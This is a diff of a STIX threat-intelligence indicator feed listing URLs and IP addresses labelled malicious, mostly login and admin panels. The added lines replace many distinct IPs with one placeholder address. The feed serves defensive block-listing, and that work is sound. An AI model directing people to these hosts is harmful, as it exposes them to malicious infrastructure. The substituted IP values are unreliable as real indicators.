'http://pa-buol.go.id/wp/panelnew/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:18.132Z"} -{"created":"2020-02-03T01:59:28.343Z","description":"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime","id":"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-03T01:59:28.343Z","name":"mal_url: http://5.188.60.59/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://5.188.60.59/auth.php']","type":"indicator","valid_from":"2020-02-03T01:59:28.343Z"} +{"created":"2020-02-03T01:59:28.343Z","description":"TS ID: 55283402103; iType: mal_url; State: active; Org: MoreneHost; Source: 
CyberCrime","id":"indicator--a6588ee7-309e-49de-9884-faa2bdd702d2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-02-03T01:59:28.343Z","name":"mal_url: http://89.160.20.156/auth.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/auth.php']","type":"indicator","valid_from":"2020-02-03T01:59:28.343Z"} {"created":"2020-02-03T01:59:33.587Z","description":"TS ID: 55283402100; iType: mal_url; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--8d5e44f6-7283-40f8-b9b3-2c4791832c4e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-03T01:59:33.587Z","name":"mal_url: http://anorelier.hk/fshblfn8071/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://anorelier.hk/fshblfn8071/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:33.587Z"} {"created":"2020-02-03T01:59:54.52Z","description":"TS ID: 55283402099; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--f33dd90a-b849-42af-9bcb-f60476358305","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-03T01:59:54.52Z","name":"mal_url: http://bendetta.online/mangooste/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bendetta.online/mangooste/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.52Z"} {"created":"2020-02-03T01:59:54.544Z","description":"TS ID: 55283402097; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--27f2f598-95d6-4e35-a42e-240093d4452d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-03T01:59:54.544Z","name":"mal_url: 
http://kayfundz.ru/kay/eng/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kayfundz.ru/kay/eng/admin.php']","type":"indicator","valid_from":"2020-02-03T01:59:54.544Z"} {"created":"2020-02-05T01:58:09.73Z","description":"TS ID: 55287965572; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--65a8989b-25c3-498e-8247-0514d5aa719e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-02-05T01:58:09.73Z","name":"mal_url: http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://unrrwa.org/rich/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:09.73Z"} -{"created":"2020-02-05T01:58:17.365Z","description":"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-05T01:58:17.365Z","name":"mal_url: http://193.142.59.7/hoist3/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://193.142.59.7/hoist3/logs/omc.php']","type":"indicator","valid_from":"2020-02-05T01:58:17.365Z"} -{"created":"2020-02-05T01:58:17.428Z","description":"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--7aed3145-aab6-470d-bb4f-592d86654719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-02-05T01:58:17.428Z","name":"mal_ip: 46.29.161.60","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'46.29.161.60']","type":"indicator","valid_from":"2020-02-05T01:58:17.428Z"} +{"created":"2020-02-05T01:58:17.365Z","description":"TS ID: 55287965584; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e531a668-ef25-4b16-aa50-1b0b8f0f901e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-72"],"modified":"2020-02-05T01:58:17.365Z","name":"mal_url: http://89.160.20.156/hoist3/logs/omc.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/hoist3/logs/omc.php']","type":"indicator","valid_from":"2020-02-05T01:58:17.365Z"} +{"created":"2020-02-05T01:58:17.428Z","description":"TS ID: 55287965574; iType: mal_ip; State: active; Org: LLC Baxet; Source: CyberCrime","id":"indicator--7aed3145-aab6-470d-bb4f-592d86654719","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-66"],"modified":"2020-02-05T01:58:17.428Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:58:17.428Z"} {"created":"2020-02-05T01:58:31.683Z","description":"TS ID: 55287965571; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--af8e5326-c1d4-4f9e-8f47-ee23c6a2606a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T01:58:31.683Z","name":"mal_url: http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://xigkxc.xyz/Atoz/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.683Z"} -{"created":"2020-02-05T01:58:31.704Z","description":"TS ID: 55287965557; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: 
CyberCrime","id":"indicator--59c28566-62b0-4102-ad17-53ec3a143144","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-05T01:58:31.704Z","name":"mal_url: http://217.160.59.64/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://217.160.59.64/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.704Z"} -{"created":"2020-02-05T01:58:32.111Z","description":"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: CyberCrime","id":"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:32.111Z","name":"mal_url: http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://104.223.170.113/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.111Z"} +{"created":"2020-02-05T01:58:31.704Z","description":"TS ID: 55287965557; iType: mal_url; State: active; Org: 1&1 Internet AG; Source: CyberCrime","id":"indicator--59c28566-62b0-4102-ad17-53ec3a143144","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-02-05T01:58:31.704Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:31.704Z"} +{"created":"2020-02-05T01:58:32.111Z","description":"TS ID: 55287965585; iType: mal_url; State: active; Org: Global Frag Networks; Source: 
CyberCrime","id":"indicator--56524b03-3217-40a0-9180-dc8262b3b6f9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:32.111Z","name":"mal_url: http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/Silkop/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.111Z"} {"created":"2020-02-05T01:58:32.145Z","description":"TS ID: 55287965577; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--69661075-e6cb-4054-820c-61954757f0ba","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:58:32.145Z","name":"mal_url: http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://plosss.com/lok/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:32.145Z"} {"created":"2020-02-05T01:58:34.795Z","description":"TS ID: 55287965581; iType: mal_url; State: active; Org: Domain names registrar REG.RU, Ltd; Source: CyberCrime","id":"indicator--5be6be50-c2ef-4502-857e-f69dd17d37a9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.795Z","name":"mal_url: http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://everest--sh.com/coco/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:58:34.795Z"} {"created":"2020-02-05T01:58:34.836Z","description":"TS ID: 55287965567; iType: mal_url; State: active; Org: Alibaba; Source: 
CyberCrime","id":"indicator--7de3f68d-51ed-43c0-b5d9-c63d621aa99f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-02-05T01:58:34.836Z","name":"mal_url: http://domainmanagerz.net/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://domainmanagerz.net/login']","type":"indicator","valid_from":"2020-02-05T01:58:34.836Z"} {"created":"2020-02-05T01:58:41.381Z","description":"TS ID: 55287965564; iType: mal_url; State: active; Org: A2 Hosting; Source: CyberCrime","id":"indicator--08ec347d-3d22-45e6-96fc-3fc3bb37c720","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:58:41.381Z","name":"mal_url: http://groupbizconsulting.com/p3/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p3/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:58:41.381Z"} {"created":"2020-02-05T01:58:59.279Z","description":"TS ID: 55287965569; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--b845a78e-d141-455e-92ff-df401787a3cd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-02-05T01:58:59.279Z","name":"mal_url: http://samundarmarine.com/denty/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://samundarmarine.com/denty/admin.php']","type":"indicator","valid_from":"2020-02-05T01:58:59.279Z"} {"created":"2020-02-05T01:59:03.426Z","description":"TS ID: 55287965563; iType: mal_url; State: active; Org: A2 Hosting; Source: 
CyberCrime","id":"indicator--e9d4f82a-bc23-4f9a-81e0-05097acc6daa","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-05T01:59:03.426Z","name":"mal_url: http://groupbizconsulting.com/p4/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://groupbizconsulting.com/p4/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:03.426Z"} -{"created":"2020-02-05T01:59:04.695Z","description":"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--57e76166-d475-4027-b2d9-b4910c5b0747","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-05T01:59:04.695Z","name":"mal_ip: 138.201.56.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '138.201.56.185']","type":"indicator","valid_from":"2020-02-05T01:59:04.695Z"} +{"created":"2020-02-05T01:59:04.695Z","description":"TS ID: 55287965555; iType: mal_ip; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--57e76166-d475-4027-b2d9-b4910c5b0747","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-02-05T01:59:04.695Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:59:04.695Z"} {"created":"2020-02-05T01:59:06.271Z","description":"TS ID: 55287965580; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--63fdc395-3d7f-4435-a7ea-2c26783ea7b9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-02-05T01:59:06.271Z","name":"mal_url: 
http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://gpi-q.com/cake/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T01:59:06.271Z"} {"created":"2020-02-05T01:59:24.611Z","description":"TS ID: 55287965562; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--9ed89f91-5df1-4cad-b6e7-9d275759d32e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-95"],"modified":"2020-02-05T01:59:24.611Z","name":"mal_url: http://ipblasta.com/kmaker/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://ipblasta.com/kmaker/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:24.611Z"} {"created":"2020-02-05T01:59:31.341Z","description":"TS ID: 55287965559; iType: mal_url; State: active; Org: Mills College; Source: CyberCrime","id":"indicator--421221e0-b0c7-4bbe-a12c-412f689f4769","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-55"],"modified":"2020-02-05T01:59:31.341Z","name":"mal_url: http://softtouchcollars.com/origin/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://softtouchcollars.com/origin/login.php']","type":"indicator","valid_from":"2020-02-05T01:59:31.341Z"} -{"created":"2020-02-05T01:59:47.461Z","description":"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-05T01:59:47.461Z","name":"mal_ip: 162.241.216.92","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = 
'162.241.216.92']","type":"indicator","valid_from":"2020-02-05T01:59:47.461Z"} -{"created":"2020-02-05T01:59:47.506Z","description":"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:59:47.506Z","name":"mal_ip: 89.208.84.96","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.208.84.96']","type":"indicator","valid_from":"2020-02-05T01:59:47.506Z"} +{"created":"2020-02-05T01:59:47.461Z","description":"TS ID: 55287965566; iType: mal_ip; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--369ccb92-5a3b-41cf-853f-dac750e7a9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-02-05T01:59:47.461Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:59:47.461Z"} +{"created":"2020-02-05T01:59:47.506Z","description":"TS ID: 55287965561; iType: mal_ip; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--5fb846be-33fa-4bcb-ac9f-ad6a31e4daef","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-05T01:59:47.506Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T01:59:47.506Z"} {"created":"2020-02-05T02:00:16.19Z","description":"TS ID: 55287965578; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: 
CyberCrime","id":"indicator--1a4e59e6-28dd-4087-9a19-b5d274d484d5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-96"],"modified":"2020-02-05T02:00:16.19Z","name":"mal_url: http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://mikeservers.eu/kings/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:16.19Z"} {"created":"2020-02-05T02:00:23.009Z","description":"TS ID: 55287965575; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--aef5784f-1ba2-4f45-9345-9b96bffe3cfd","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-02-05T02:00:23.009Z","name":"mal_url: http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://printystore.com.pe/img/lop/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:23.009Z"} {"created":"2020-02-05T02:00:29.679Z","description":"TS ID: 55287965579; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime","id":"indicator--5fbeda08-8cf4-459a-873c-28cef82221b5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:00:29.679Z","name":"mal_url: http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://kdi-kongsberg.com/stan/Panel/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:00:29.679Z"} 
@@ -335,17 +335,17 @@ {"created":"2020-02-05T02:00:57.172Z","description":"TS ID: 55287965586; iType: mal_url; State: active; Org: Hetzner Online GmbH; Source: CyberCrime","id":"indicator--18a1307c-2dfc-43f9-9e47-93d00c63efcc","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-24"],"modified":"2020-02-05T02:00:57.172Z","name":"mal_url: http://video-ld.ru/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://video-ld.ru/panel/admin.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.172Z"} {"created":"2020-02-05T02:00:57.733Z","description":"TS ID: 55287965560; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime","id":"indicator--1e94e26d-5158-4519-b166-2b7e87c2e5de","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-75"],"modified":"2020-02-05T02:00:57.733Z","name":"mal_url: http://nortonlilly.info/emma/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/emma/login.php']","type":"indicator","valid_from":"2020-02-05T02:00:57.733Z"} {"created":"2020-02-05T02:01:03.604Z","description":"TS ID: 55287965573; iType: mal_url; State: active; Org: Relink LTD; Source: CyberCrime","id":"indicator--e396f12a-867b-4e91-8796-d042aef55ce3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-02-05T02:01:03.604Z","name":"mal_url: http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://trouserlanditd.com/didi/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:03.604Z"} -{"created":"2020-02-05T02:01:16.051Z","description":"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) 
Co.; Source: CyberCrime","id":"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:01:16.051Z","name":"mal_ip: 170.106.50.37","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '170.106.50.37']","type":"indicator","valid_from":"2020-02-05T02:01:16.051Z"} +{"created":"2020-02-05T02:01:16.051Z","description":"TS ID: 55287965589; iType: mal_ip; State: active; Org: Tencent Cloud Computing (Beijing) Co.; Source: CyberCrime","id":"indicator--5b35dbd2-4915-4c56-9213-7d5272715cb7","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-94"],"modified":"2020-02-05T02:01:16.051Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-05T02:01:16.051Z"} {"created":"2020-02-05T02:01:18.261Z","description":"TS ID: 55287965582; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime","id":"indicator--8dff68c1-1114-4092-9f29-f655f27d2337","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.261Z","name":"mal_url: http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://espoirpharmaceutical.com/includes/Panel/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.261Z"} {"created":"2020-02-05T02:01:18.285Z","description":"TS ID: 55287965565; iType: mal_url; State: active; Org: CyrusOne LLC; Source: 
CyberCrime","id":"indicator--19636e7d-febc-4ae1-879a-28af129c19b3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-60"],"modified":"2020-02-05T02:01:18.285Z","name":"mal_url: http://credoaz.com/journals/webpanel/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://credoaz.com/journals/webpanel/login.php']","type":"indicator","valid_from":"2020-02-05T02:01:18.285Z"} {"created":"2020-02-05T02:01:21.73Z","description":"TS ID: 55287965587; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime","id":"indicator--593225c7-68c8-44db-82bf-2c550931a60c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-02-05T02:01:21.73Z","name":"mal_url: http://bestlogs.myjino.ru/best/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://bestlogs.myjino.ru/best/admin.php']","type":"indicator","valid_from":"2020-02-05T02:01:21.73Z"} -{"created":"2020-02-06T02:10:08.953Z","description":"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: CyberCrime","id":"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:10:08.953Z","name":"mal_url: http://46.229.215.123/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://46.229.215.123/login']","type":"indicator","valid_from":"2020-02-06T02:10:08.953Z"} +{"created":"2020-02-06T02:10:08.953Z","description":"TS ID: 55290730789; iType: mal_url; State: active; Org: TimeWeb Ltd.; Source: 
CyberCrime","id":"indicator--782e9560-3f13-43eb-9720-e5b43d9a8dd9","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-02-06T02:10:08.953Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-02-06T02:10:08.953Z"} {"created":"2020-02-06T02:10:15.947Z","description":"TS ID: 55290730799; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--9586420f-3737-47b6-8d58-526f629d66e2","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-02-06T02:10:15.947Z","name":"mal_url: http://justwer.site/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://justwer.site/login']","type":"indicator","valid_from":"2020-02-06T02:10:15.947Z"} -{"created":"2020-02-06T02:10:15.988Z","description":"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--4d0f3370-af7d-4902-abea-65d9f924458b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-06T02:10:15.988Z","name":"mal_ip: 173.247.252.61","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '173.247.252.61']","type":"indicator","valid_from":"2020-02-06T02:10:15.988Z"} +{"created":"2020-02-06T02:10:15.988Z","description":"TS ID: 55290730784; iType: mal_ip; State: active; Org: InMotion Hosting; Source: CyberCrime","id":"indicator--4d0f3370-af7d-4902-abea-65d9f924458b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-52"],"modified":"2020-02-06T02:10:15.988Z","name":"mal_ip: 
89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-02-06T02:10:15.988Z"} {"created":"2020-02-06T02:10:22.051Z","description":"TS ID: 55290730781; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--12dac6fb-e53b-4742-9cc4-da362e880571","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-02-06T02:10:22.051Z","name":"mal_url: http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://u-knlt.com/Pablo/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-02-06T02:10:22.051Z"} -{"created":"2020-02-06T02:10:23.024Z","description":"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime","id":"indicator--d5c7a00c-4ab5-4501-b79c-4e96838e5602","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-79"],"modified":"2020-02-06T02:10:23.024Z","name":"mal_ip: 91.215.169.220","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '91.215.169.220']","type":"indicator","valid_from":"2020-02-06T02:10:23.024Z"} +{"created":"2020-02-06T02:10:23.024Z","description":"TS ID: 55290730808; iType: mal_ip; State: active; Org: Best-Hoster Group Co. 
